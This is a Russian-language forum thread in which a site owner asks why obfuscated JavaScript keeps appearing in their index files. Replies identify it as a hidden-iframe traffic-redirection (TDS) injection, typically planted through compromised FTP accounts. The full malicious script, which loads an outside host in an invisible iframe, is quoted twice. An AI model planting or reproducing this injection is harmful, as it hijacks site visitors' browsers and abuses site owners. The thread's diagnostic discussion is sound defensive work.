Доброго времени суток уважаемые. Собственно такая проблема, зашол на сайт на свой который размещается на N'ом хостинге, в папке с сайтом появился файл index.htm, с содержимым: [js] <script>var edt="<";var rfb="i";var frryd=" ";var ofqxg="qtgem='zOHCJcAc' dkinq='eoXzrPaL' ossqy='7RLk4n20' kfhdk='pTS7kcyJ' ndjyc='3vJNmF8U' advyo='6Kb5FgA7' jnpfm='VtBabOSM' src=";var cotkx="ame>";var tfodg="/";var mtkyr=" ";var kyn="f";var lik="r";var ccp="a";var igqdw="sarwb='gOAnpqXg' lhkxb='ELnHa7XF' uumel='daeUgBL5' hrlno='GgqCm2bY' nfapb='3yM4wOuK' yachx='z7iU8dZO' ";var lgg="m";var bfq="e";var vvbiu="width=308 ";var coneh="http://icqdosug.com/pood";var nyoih="height=56 ";var uafqa="style='display:none'";var kbkcg=coneh+tfodg;var jdlbv="></ifr";document.write(edt+rfb+kyn+lik+ccp+lgg+bfq+frryd+ofqxg+kbkcg+mtkyr+igqdw+vvbiu+nyoih+uafqa+jdlbv+cotkx);</script> [/js] Затем просмотрел index.php, в начале файла появился следующий код: [js] <script>var edt="<";var rfb="i";var frryd=" ";var ofqxg="qtgem='zOHCJcAc' dkinq='eoXzrPaL' ossqy='7RLk4n20' kfhdk='pTS7kcyJ' ndjyc='3vJNmF8U' advyo='6Kb5FgA7' jnpfm='VtBabOSM' src=";var cotkx="ame>";var tfodg="/";var mtkyr=" ";var kyn="f";var lik="r";var ccp="a";var igqdw="sarwb='gOAnpqXg' lhkxb='ELnHa7XF' uumel='daeUgBL5' hrlno='GgqCm2bY' nfapb='3yM4wOuK' yachx='z7iU8dZO' ";var lgg="m";var bfq="e";var vvbiu="width=308 ";var coneh="http://icqdosug.com/pood";var nyoih="height=56 ";var uafqa="style='display:none'";var kbkcg=coneh+tfodg;var jdlbv="></ifr";document.write(edt+rfb+kyn+lik+ccp+lgg+bfq+frryd+ofqxg+kbkcg+mtkyr+igqdw+vvbiu+nyoih+uafqa+jdlbv+cotkx);</script> [/js] Доступ к сайту имею только я, никаких троянских программ не обнаружил у себя на компьюетере, установлен файрвол и антивирус. Это уже 2й случай, неделю назад этот же код был в файле index.php... Вообще откуда это могло появится, если я даже не редактировал эти файлы...
alexei Это генераторы траффика, довольно распространенная вещь, а вносят они себя на сайт через украденные или подобранные FTP аккаунты.
Валерия Что это такое: небольшой вредоносный JavaScript-код, который добавляет на страницу невидимый IFRAME, который вынуждает браузер посетителя делать подзапрос на сторонний сайт, типа ты "зашла" на него. Зачем это надо: видела рекламу "раскрутим ваш сайт в разы! целевой траффик за копейки!" и т. д.? Это они
Чаще всего в iframe находится сайт с названием ****.in?какие_то_данные. Это и есть перегонка траффика. TDS. Мне подобный код вставили месяц назад где-то. Во всех index-файлы (в остальные не смогли почему-то). В логах обнаружил ошибку скрипта, из-за которого злоумышленник смог получить доступ к ФТП. Вот и все =))) Вещь не приятная, избавлялся долго, даже сменив пароли и залатав дыру =)